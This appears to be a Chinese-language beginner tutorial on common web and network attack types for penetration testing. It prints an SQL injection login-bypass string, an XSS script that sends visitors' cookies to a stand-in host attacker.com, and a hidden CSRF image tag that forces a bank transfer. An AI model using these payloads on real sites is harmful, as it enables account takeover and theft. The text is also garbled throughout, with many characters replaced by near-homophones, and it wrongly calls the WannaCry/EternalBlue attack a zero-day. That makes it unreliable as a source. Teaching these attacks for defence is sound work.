共计 2076 个字符,预计需要花费 6 分钟才能阅读完成。
在本节中,咱们将介绍一些常见的攻打类型,以帮忙你更好地理解浸透测试的指标和办法。咱们将涵盖以下攻打类型:
- SQL 注入攻打
- 跨站脚本攻打(XSS)
- 跨站申请伪造(CSRF)
- 会话劫持
- 社会工程攻打
- 暴力破解
- 分布式拒绝服务攻打(DDoS)
- 零日攻打
1. SQL 注入攻打
SQL 注入攻打是一种利用 Web 应用程序中的安全漏洞,将歹意 SQL 代码注入到后端数据库中执行的攻打。这种攻打可能导致攻击者获取或批改数据库中的数据,甚至获取对整个零碎的管制。
实例:假如一个 Web 应用程序容许用户通过输出用户名和明码进行登录。攻击者可能尝试在用户名字段中输出如下内容:
'OR'1'='1
这可能导致生成如下 SQL 查问:
SELECT * FROM users WHERE username=''OR'1'='1'AND password='...'
因为 '1'='1'
始终为真,这将导致查问返回所有用户记录,使攻击者可能绕过身份验证。
2. 跨站脚本攻打(XSS)
跨站脚本攻打(Cross-site Scripting,XSS)是一种利用 Web 应用程序中的安全漏洞,将歹意脚本嵌入到受害者的浏览器中执行的攻打。这可能导致攻击者盗取用户的登录凭据、篡改 Web 页面内容或施行其余歹意行为。
实例:假如一个社交媒体网站容许用户公布带有 HTML 标签的评论。攻击者可能尝试公布如下评论:
<script>document.location='http://attacker.com/stealcookie.php?cookie='+document.cookie;</script>
当其余用户查看该评论时,歹意脚本将在他们的浏览器中执行,将他们的 cookie 发送给攻击者。
3. 跨站申请伪造(CSRF)
跨站申请伪造(Cross-site Request Forgery,CSRF)是一种利用用户已登录的 Web 应用程序的信赖,诱使用户执行未经受权的操作的攻打。
实例:假如一个银行网站容许用户通过发送如下申请进行转账操作:
http://bank.com/transfer?to=recipient&amount=100
攻击者可能尝试诱使用户拜访如下链接:
http://attacker.com/evil-page.html
其中 evil-page.html
蕴含如下 HTML 代码:
<img src="http://bank.com/transfer?to=attacker&amount=1000" width="0" height="0">
当用户拜访该页面时,其浏览器将向银行网站发送申请,导致未经受权的转账操作。
4. 会话劫持
会话劫持是指攻击者利用安全漏洞窃取用户的会话 ID(例如,通过嗅探网络流量或 XSS 攻打),从而模拟用户身份进行未经受权的操作。
实例:假如一个 Web 应用程序应用 cookie 存储会话 ID。攻击者可能利用 XSS 攻打窃取受害者的 cookie,而后在本人的浏览器中设置该 cookie,以模拟受害者的身份登录应用程序。
5. 社会工程攻打
社会工程攻打是指攻击者通过心理操纵伎俩,诱使用户泄露敏感信息或执行未经受权的操作。这种攻打通常波及坑骗、假装和其余人际技能。
实例:假如攻击者通过电子邮件假冒某公司的 IT 部门,要求用户提供登录凭据以进行“系统维护”。信赖这封邮件的用户可能会不经意地将本人的用户名和密码发送给攻击者。
6. 暴力破解
暴力破解是一种试图通过尝试所有可能的组合来猜想明码或密钥的攻打办法。这种攻打通常须要大量的计算资源和工夫,但在某些状况下可能是无效的。
实例:攻击者可能应用明码猜想工具(如 John the Ripper 或 Hydra)尝试破解某个账户的明码。为了减速破解过程,攻击者可能应用字典攻打(尝试罕用明码)或彩虹表(事后计算的明码哈希表)。
7. 分布式拒绝服务攻打(DDoS)
分布式拒绝服务攻打(Distributed Denial of Service,DDoS)是一种通过大量流量吞没指标零碎,使其无奈失常提供服务的攻打。这种攻打通常利用僵尸网络(由攻陷的计算机组成的网络)发动。
实例:攻击者可能应用僵尸网络对指标网站发动 SYN 洪水攻打。在这种攻打中,大量伪造的 TCP SYN 申请被发送到指标服务器,导致其资源耗尽,无奈解决非法申请。
8. 零日攻打
零日攻打是利用尚未公开披露或修复的软件破绽进行的攻打。这种攻打通常在破绽被开发者发现并修复之前产生。
实例:2017 年的 WannaCry 勒索软件攻打就是一个典型的零日攻打实例。攻击者利用了 Windows SMB 协定中的一个未公开披露的破绽(EternalBlue),导致寰球范畴内的计算机系统被感化并加密文件,要求领取赎金。
通过学习这些常见的攻打类型,你当初曾经对浸透测试的基本概念有了更深刻的理解。在接下来的章节中,咱们将具体介绍如何辨认和进攻这些攻打,以及如何进行无效的浸透测试。
举荐浏览:
https://mp.weixin.qq.com/s/dV2JzXfgjDdCmWRmE0glDA
https://mp.weixin.qq.com/s/an83QZOWXHqll3SGPYTL5g